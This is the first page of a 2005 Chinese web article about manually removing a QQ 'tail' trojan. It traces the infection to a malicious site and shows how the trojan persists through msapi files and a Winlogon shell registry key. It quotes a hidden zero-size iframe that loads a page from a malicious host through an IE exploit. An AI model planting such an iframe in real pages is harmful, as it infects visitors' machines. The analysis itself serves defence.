文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术QQ新尾巴病毒手动清除记
精品推荐
特别推荐
·新手轻轻松松做网管必须掌握的步骤
·ADSL路由方式的NAT(端口映射)
·保护系统 彻底清除Infostealer.Gampass病毒
·网管高招另类方法解决离奇断网故障二例
·Windows2000 下管理员账户真的不安全
·Windows下权限设置详解
·网络排障实战:路由器和交换机为何不通?
·安装网卡驱动常见故障及解决方法
·多种方法让网络共享资源自动映射
·Delphi中的流技术- 详细篇
·秘籍宝典:Ping命令的使用
·教你伪装MAC地址
·掌握超五类 双绞线的 原理与制作方法
·让你的ADSL不再自动掉线
·快速增强路由器安全的十个小技巧
·高手教你实测无线路由器的安全功能
·无线上网搭配方案
·UNIX 常用的指令/终结完整编
·解决南北网络问题 千渡南北互通
·ADSL上网的常见问题及分析集锦
热点TOP10
·惊恐:知道对方IP就能入侵别人的电脑
·窥视计算机病毒的磁盘存储结构
·保护系统 彻底清除Infostealer.Gampass病毒
·Windows 安全诊所:清除间谍软件下篇
·光辉回忆录:黑客创下的“重大战绩”
·ADSL Modem防攻击“修炼秘技”
·数千黑客狂攻世界杯 上演网络狙击战
·真的无罪吗?窥视Serv-U密码破解
·从入门到精通 网吧免费上网狙击战
·网络江湖传奇:认识中国的黑客精英
·批量查询域名工具Domain Inspect 1.5 汉化注册版
·汉化软件教程
·世界上最好的磁盘碎片整理工具原版+汉化+注册机
·SQL Navigator
·配置 VMware通过令牌访问LAN
·狂拽~用别人的服务器做硬盘!
·无图像、无声音、图像声音不同步问题的解决办法
·[常用]更快的文件打包 Ultraiso 软件教学
·驯服你的Windows Firewall
·windows溢出随笔

QQ新尾巴病毒手动清除记

日期:2005年10月31日 作者: 查看:[大字体 中字体 小字体]


昨天办公室里刚帮别人装好的一台机器被同事玩qq染上了病毒,他无意中点击了别人给他发来信息里的网址,说可以免费得qq币,以前看到过此类qq病毒,但一直没有机会接触,于是就找杀毒软件杀,下了金山的qq病毒专杀工具,查到内存里有Win32.Troj.QQMydj2005dl.125440,但是杀一下,屏幕马上又重新启动了一下shell(也就是explorer),再运行qq还是一样,病毒依旧。
Click to Open in New Window

  呵呵,看来内存里的进程没清掉,文件扫描并没发现有病毒.于是想先把ie打补丁,但补丁却提示我的ie6不是ie6,补丁也打不上,于是我想就看看到底这个网站作了什么手脚.
  "我不下地狱谁下地狱"想起了佛祖为了拯救世人而所做的,我做了一个愚蠢而鲁莽的决定:(决定用我的机器染一次病毒,但我却范了一个严重的错误,忘记了备份注册表(以后要考虑周全再行事,各位千万不要学我啊)后果可想而知,我的qq也一样,只要一点用户聊天,病毒自己就会定时的粘贴一些垃圾和网址到发送对话框中,并自动发送。如此开始了我的手动清除之旅,我用一个httpdebug调试器,开始连接调试qq上发过来的那个网站,然后察看它网页的源代码又上网查找相关的漏洞,原来是ie的iframe漏洞,它可以嵌入别的网页,但存在着缓冲区漏洞,如果恶意网页构造特定的内容就可以让未补丁的ie客户机执行任意指令。发现问题在这里
  〈Iframe src="http://www.joyiex.com/dq.htm" width="0" height="0" scrolling="no"
frameborder="0"〉〈/iframe〉
  〈noscript〉〈iframe src=*〉〈/iframe〉〈/noscript〉
  又开始连接dq.htm,结果又得到
  
  
  
  看来是个asp,接着连接dq.asp结果得到的如下图。
Click to Open in New Window

  不是把,我主页,搜索页等等都被它替换了,最可气连regedit都给我禁止了我作了个解锁的reg文件,这个文件网上很多,总算能编辑注册表了,看了看Run键值并未有什么可疑程序,又下了个3721的ie修复,还原了一下ie的各设置,但qq病毒还是没弄掉,于是我用vc自带的进程查看器pview和spy++查看一下有什么进程可疑,但都没发现,突然想起金山qq专杀可以看到那个进程号,于是就发现那个进程id是explorer,这是shell进程,看来是病毒是通过explorer执行了其他程序,于是确定硬盘上一定有它的文件,这回又使用了一下金山qq专杀,把内存项去掉了。
Click to Open in New Window

  只查找c:盘,结果是有一个病毒,但列表中并没出现哪个文件,于是又多次查找,终于大概看到是ms打头的文件,于是直接到目录查看,看到有msapi.dll,msapi.exe两个文件是染毒时间产生的,基本判断是这两个文件了。.exe 可以删掉,但马上又会新产生一个,.dll删不掉,看来内存中的程序是以dll形态运行着,如果发现.exe不存在就生成一个新的,于是又到注册表里搜索msapi,终于发现在winlogin 的子键shell里有,呵呵总算找到它了,下面把它删除了,但是再一看又出来了,看来内存中的程序一直监控着这个键值,它是下次系统启动病毒正确执行的关键。
Click to Open in New Window

[1] [2] 下一页 




上一篇:SOFTICE安装及使用

下一篇:Windows2000/NT/XP系统如何找回丢失的管理员密码

QQ新尾巴病毒手动清除记 相关文章:
·警惕高危木马病毒 随意下载病毒窃密码
·修改注册表,清除黑客程序
·设置路由器ACL有效防范黑客与病毒
·清除电脑里所有垃圾系统文件
·完整清除XP垃圾文件的秘密武器
·怎样清除硬盘及系统垃圾文件?
·清除垃圾文件DIY
·大水牛下载者分析及手工清除办法
·三层交换机安全策略预防病毒
·计算机病毒防治常遇问题
QQ新尾巴病毒手动清除记 相关软件:
·兔子尾巴CD转MP3软件V2.0
·瑞星“墨菲(Trojan.Mofei)”病毒专杀工具 V1.4
·冲击波病毒专杀工具包 V 1.0
·瑞星“Zotob蠕虫(Worm.Zotob)”病毒专杀工具 V1.00
·“科多兽”病毒专杀工具 V3.6
·“征途木马”病毒专杀工具 V3.3
·美河原创-计算机病毒与维护 视频 详见查看
·Kaspersky(卡巴斯基) Anti-Virus 6系列累计病毒库 2007.02.03
·金山十大流行病毒专杀工具 Build 2004.11.15
·瑞星-MSN蠕虫病毒专用查杀工具 V1.7

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot